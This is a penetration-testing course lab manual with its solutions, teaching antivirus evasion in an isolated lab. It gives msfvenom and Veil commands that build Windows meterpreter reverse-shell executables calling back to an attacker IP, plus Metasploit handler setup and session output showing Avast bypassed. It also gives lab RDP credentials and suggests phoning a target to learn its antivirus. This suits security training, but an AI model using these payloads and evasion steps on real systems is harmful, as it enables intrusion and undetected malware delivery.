© 2018 Caendra, Inc.

| Hera for PTP | Bypassing AV 1

In this lab you will play with malicious code and how they can be used in order to bypass
AV solutions.

Victim01-Avast Victim02-MSE
172.16.5.10 172.16.5.5

Network 172.16.5.0

Pentester – Your PC
172.16.5.x

• Understand different techniques that can be used to bypass AV

© 2018 Caendra, Inc. | Hera for PTP | Bypassing AV 2

 • MSFpayload
• Veil

To guide you during the lab you will find different Tasks.

Tasks are meant for educational purposes and to show you the usage of different tools and
different methods to achieve the same goal.

They are not meant to be used as a methodology.

Armed with the skills acquired though the task you can achieve the Lab goal.

If this is the first time you do this lab, we advise you to follow these Tasks.

Once you have completed all the Tasks, you can proceed to the end of this paper and check
the solutions.

• Metasploit
• Veil

Labs machines are not connected to the internet.

© 2018 Caendra, Inc. | Hera for PTP | Bypassing AV 3

Note: You might need to create more than one malicious code until you are able to bypass
both AV solutions (Avast and Microsoft Security Essentials).

Hint: In both systems (172.16.5.5 and 172.16.5.10), you can login via rdesktop, with the
username admin and the password et1@sR7!

Describe what command/tool/technique you have used in order to successfully complete

this task:

© 2018 Caendra, Inc. | Hera for PTP | Bypassing AV 4

Describe what command/tool/technique you have used in order to successfully complete
this task:

Describe what command/tool/technique you have used in order to successfully complete

this task:

© 2018 Caendra, Inc. | Hera for PTP | Bypassing AV 5

© 2018 Caendra, Inc. | Hera for PTP | Bypassing AV 6
There are a couple of different techniques and tools we can use to create malicious code.
We will start by using msfvenom. It's a command line tool that can be used to create
various types of shell code.

To check the huge list of available payloads, run from the console the following command:

root@kali:~/LABS/16# msfvenom -l

This is the command that will generate our first malicious code:

root@kali:~/LABS/16# msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.5.50

LPORT=4444 -f exe > rTCP.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes

Note: Check your VPN IP address, it might be different from 172.16.5.50.

Some information about the previous command:

• -p Windows/Meterpreter/Reverse_tcp
The payload to add into our shellcode. Once executed it will launch a Reverse TCP
meterpreter shell to our system at 172.16.5.50 to port 4444. We'll need to have
the multi/handler module running and waiting for incoming connections on that
port and IP.
• LHOST=172.16.5.50
Our listening IP address
• LPORT=4444
The listening port on which the victim will connect back. Keep in mind that with a
firewall in the middle of these systems we must pick a port that is allowed.
• -f exe
The file format

© 2018 Caendra, Inc. | Hera for PTP | Bypassing AV 7

 • > rTCP.exe
The executable will be saved in a file named rTCP.exe in the current folder.

Now, we need to upload our malicious file, rTCP.exe, onto our victim system:
172.16.5.10. To do this, we'll start a local webserver with python’s “SimpleHTTPServer”
module, and then will copy the shell in the web root. Later, we'll download this file form the
victim machine.

root@kali:~/LABS/16# python -m SimpleHTTPServer 80

Serving HTTP on 0.0.0.0 port 80 ...

Now, we need to start the multi/handler exploit from Metasploit. In this way, we'll have
something listening from when the victim will open the rTCP.exe file.

Here's the exploit setup:

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set LHOST 172.16.5.50
LHOST => 172.16.5.50
msf exploit(handler) > exploit

[*] Started reverse TCP handler on 172.16.5.50:4444

[*] Starting the payload handler...

© 2018 Caendra, Inc. | Hera for PTP | Bypassing AV 8

Connect in RDP to our victim system:

root@kali:~/LABS/16# rdesktop 172.16.5.10 -u admin -p et1@sR7!

Since we are going to download our malicious shell, let’s disable Avast AV. Open Avast
from the desktop icon, and then from settings > Active Protection, disable all the
options:

Now, open Chrome and download the rTCP.exe from our webserver:

© 2018 Caendra, Inc. | Hera for PTP | Bypassing AV 9

Let's execute the shell by opening the shell just downloaded. In Metasploit, we should have
our meterpreter shell active as follow:

[*] Started reverse TCP handler on 172.16.5.50:4444

[*] Starting the payload handler...
[*] Sending stage (957999 bytes) to 172.16.5.10
[*] Meterpreter session 1 opened (172.16.5.50:4444 -> 172.16.5.10:1057) at 2016-05-17
18:03:17 +0200

meterpreter >

Let's query the shell by asking some basic information, like the following:

meterpreter > sysinfo

Computer : VICTIM01-AVAST
OS : Windows 7 (Build 7600).
Architecture : x64 (Current Process is WOW64)
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/win32

© 2018 Caendra, Inc. | Hera for PTP | Bypassing AV 10

Or for example, we can run the calculator on the victim system:

meterpreter > execute -f calc.exe

Process 2788 created.

And in a similar way we can run other commands. But now, let's close the meterpreter
session by sending the quit command.

meterpreter > quit

[*] Shutting down Meterpreter...

[*] 172.16.5.10 - Meterpreter session 1 closed. Reason: User exit

msf exploit(multi/handler) >

© 2018 Caendra, Inc. | Hera for PTP | Bypassing AV 11

Let's go back to our victim RDP and let's re-enable the antivirus. Now, let's try to download
again the shell from Chrome. As you can see, the antivirus has blocked our file because it's
harmful for the system:

© 2018 Caendra, Inc. | Hera for PTP | Bypassing AV 12

As a second attempt, let’s try to encode our shell as follows:

root@kali:~/LABS/16# msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.5.50

LPORT=4444 -f exe -e x86/shikata_ga_nai -i 5 > rTCPenc.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 5 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai succeeded with size 387 (iteration=1)
x86/shikata_ga_nai succeeded with size 414 (iteration=2)
x86/shikata_ga_nai succeeded with size 441 (iteration=3)
x86/shikata_ga_nai succeeded with size 468 (iteration=4)
x86/shikata_ga_nai chosen with final size 468
Payload size: 468 bytes
root@kali:~/LABS/16# cp rTCPenc.exe /var/www/html/

Then, download the new file, eTCPenc.exe and check if Avast is able to detect it:

As you can see, it was still detected by Avast.

© 2018 Caendra, Inc. | Hera for PTP | Bypassing AV 13

Let’s try another, very powerful, tool that can be used to bypass AVs: Veil.

In Kali we can install Veil following this guide: https://www.veil-framework.com/veil-is-

available-in-kali-linux/ .

In newer versions of kali (rolling), it can be installed with the following command:

root@kali:~/LABS/16# apt install veil-evasion

root@kali:~/LABS/16# veil

Once installed, just type veil to launch its menu:

root@kali:~/LABS/16# veil
===============================================================================
Veil | [Version]: 3.1.7
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

Main Menu

2 tools loaded

Available Tools:

1) Evasion
2) Ordnance

Available Commands:

exit Completely exit Veil

info Information on a specific tool
list List available tools
options Show Veil configuration
update Update Veil
use Use a specific tool

Veil>:

Type “use 1” to load the Evasion menu.

Veil>: use 1
===============================================================================
Veil-Evasion
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

© 2018 Caendra, Inc. | Hera for PTP | Bypassing AV 14

Veil-Evasion Menu

41 payloads loaded

Available Commands:

back Go to Veil's main menu

checkvt Check VirusTotal.com against generated hashes
clean Remove generated artifacts
exit Completely exit Veil
info Information on a specific payload
list List available payloads
use Use a specific payload

Veil/Evasion>: list

Type list to check the complete list of available payloads:

[*] Available Payloads:

…
25) python/meterpreter/bind_tcp.py

26) python/meterpreter/rev_http.py

27) python/meterpreter/rev_https.py
28) python/meterpreter/rev_tcp.py
29) python/shellcode_inject/aes_encrypt.py
30) python/shellcode_inject/arc_encrypt.py
31) python/shellcode_inject/base64_substitution.py
…

© 2018 Caendra, Inc. | Hera for PTP | Bypassing AV 15

For this scenario, let's use the payload: python/meterpreter/rev_http.py (#26). So,
let's enter the command “use 26” in the menu console. Here's the new menu:

Veil/Evasion>: use 26
===============================================================================
Veil-Evasion
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

Payload Information:

Name: Pure Python Reverse HTTP Stager

Language: python
Rating: Excellent
Description: pure windows/meterpreter/reverse_http stager, no
shellcode

Payload: python/meterpreter/rev_http selected

Required Options:

Name Value Description

---- ----- -----------
CLICKTRACK X Optional: Minimum number of clicks to execute
payload
COMPILE_TO_EXE Y Compile to an executable
CURSORMOVEMENT FALSE Check if cursor is in same position after 30 seconds
DETECTDEBUG FALSE Check if debugger is present
DOMAIN X Optional: Required internal domain
EXPIRE_PAYLOAD X Optional: Payloads expire after "Y" days
HOSTNAME X Optional: Required system hostname
INJECT_METHOD Virtual Virtual, Void, or Heap
LHOST The listen target address
LPORT 4444 The listen port
MINRAM FALSE Check for at least 3 gigs of RAM
PROCESSORS X Optional: Minimum number of processors
SANDBOXPROCESS FALSE Check for common sandbox processes
SLEEP X Optional: Sleep "Y" seconds, check if accelerated
USERNAME X Optional: The required user account
USERPROMPT FALSE Make user click prompt prior to execution
USE_PYHERION N Use the pyherion encrypter
UTCCHECK FALSE Optional: Validates system does not use UTC timezone
VIRTUALDLLS FALSE Check for dlls loaded in memory
VIRTUALFILES FALSE Optional: Check if VM supporting files exist

Available Commands:

back Go back to Veil-Evasion

exit Completely exit Veil
generate Generate the payload
options Show the shellcode's options
set Set shellcode option

© 2018 Caendra, Inc. | Hera for PTP | Bypassing AV 16

[python/meterpreter/rev_http>>]:

Let's setup the payload as follows:

[python/meterpreter/rev_http>>]: set LPORT 4444

[i] LPORT => 4444
[python/meterpreter/rev_http>>]: set LHOST 172.16.5.50
[i] LHOST => 172.16.5.50

© 2018 Caendra, Inc. | Hera for PTP | Bypassing AV 17

Once configured, let's generate our exploit by sending the generate command:

[python/meterpreter/rev_http>>]: generate

Next, we need to assign a name for the malicious file that we are creating. In this example,
let’s use the name rTCPveil, no extension is needed:

[>] Please enter the base name for output files (default is payload): rTCPveil

After that, select the default executable option:

[?] How would you like to create your payload executable?

1 - PyInstaller (default)
2 - Py2Exe

[>] Please enter the number of your choice: 1

Here's the result of the executable:

[*] Language: python

[*] Payload Module: python/meterpreter/rev_http
[*] Executable written to: /var/lib/veil/output/compiled/rTCPveil.exe
[*] Source code written to: /var/lib/veil/output/source/rTCPveil.py
[*] Metasploit Resource file written to: /var/lib/veil/output/handlers/rTCPveil.rc

Hit enter to continue...

Then, once again, let’s copy the executable created by veil to our locat directory, so we can
download it in our victim machine, using the python SimpleHTTPServer.

root@kali:~/LABS/16# cp /var/lib/veil/output/compiled/rTCPveil.exe .

© 2018 Caendra, Inc. | Hera for PTP | Bypassing AV 18

Now, let's launch the multi/handler exploit in Metasploit, so you can receive the reverse
connection from the victim, but make sure to configure the payload on the handler to a
“reverse_http” payload as we used that for the creation of the Veil payload:

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set LHOST 172.16.5.50
LHOST => 172.16.5.50
msf exploit(handler) > exploit

[*] Started reverse TCP handler on 172.16.5.50:4444

[*] Starting the payload handler...

After that, connect into the system 172.16.5.10 (where Avast is installed and enabled)
and then download this new executable (rTCPveil.exe) and see if you are still detected by
the antivirus.

If everything went well, you will be able to download the executable successfully. Then, go
back to the multi/handler exploit and see if you got a meterpreter session from the system
172.16.5.10 after the malware was ran:

[*] Started HTTP reverse handler on http://172.16.5.50:4444

msf exploit(multi/handler) > [*] http://172.16.5.50:4444 handling request from
172.16.5.10; (UUID: b2nzvkq7) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 3 opened (172.16.5.50:4444 -> 172.16.5.10:1069) at 2018-05-03
11:34:26 -0400

msf exploit(multi/handler) > sessions -i 3

[*] Starting interaction with 3...

meterpreter > getuid

Server username: VICTIM01-AVAST\admin
meterpreter >

Type ps in the meterpreter session and see if you are able to see one of the Avast
executable still running in that system. It confirms that we were able to successfully get
unnoticed by Avast.

© 2018 Caendra, Inc. | Hera for PTP | Bypassing AV 19

meterpreter > ps

Process List
============

PID PPID Name Arch Session User

Path
--- ---- ---- ---- ------- ---- ---
-
0 0 [System Process]
4 0 System x64 0
304 4 smss.exe x64 0 NT AUTHORITY\SYSTEM
C:\Windows\System32\smss.exe
396 388 csrss.exe x64 0 NT AUTHORITY\SYSTEM
C:\Windows\System32\csrss.exe
400 540 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
C:\Windows\System32\svchost.exe
436 428 csrss.exe x64 1 NT AUTHORITY\SYSTEM
C:\Windows\System32\csrss.exe

1092 540 AvastSvc.exe x86 0 NT AUTHORITY\SYSTEM

C:\Program Files\AVAST Software\Avast\AvastSvc.exe

1112 664 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE

C:\Windows\System32\wbem\WmiPrvSE.exe

We do not recommend that you upload your malicious files generated by any source
(msfvenom, veil, etc.) to online AV scanners like www.virustotal.com, thus, because later
on these files are shared with AV companies who will be able to create signatures to catch
them. The best thing to do is first, find out what your target’s customer use as AV solution
(see job posts and forums in order to see if its published somewhere. You may also use
your social engineering skills (call and ask) and you will be surprised how people share this
information without any concerns. Then download a trial version of the AV solution used
by your customer in a lab environment and update it to the latest virus definition. Once you
are able to bypass it, you can deliver the piece of code considering that it’s part of your
engagement’s scope.

I have uploaded the piece of code generated by veil (according to the steps above) to
Virustotal so you can have an idea about how it’s really powerful (only 3 from 50 vendors
detected it):

© 2018 Caendra, Inc. | Hera for PTP | Bypassing AV 20

Repeat the steps done in Task 3, however, now in the system 172.16.5.5 which is
running Microsoft Security Essentials.

If everything goes well, the same piece of malware generated by veil (above) should bypass
MSE as well.

© 2018 Caendra, Inc. | Hera for PTP | Bypassing AV 21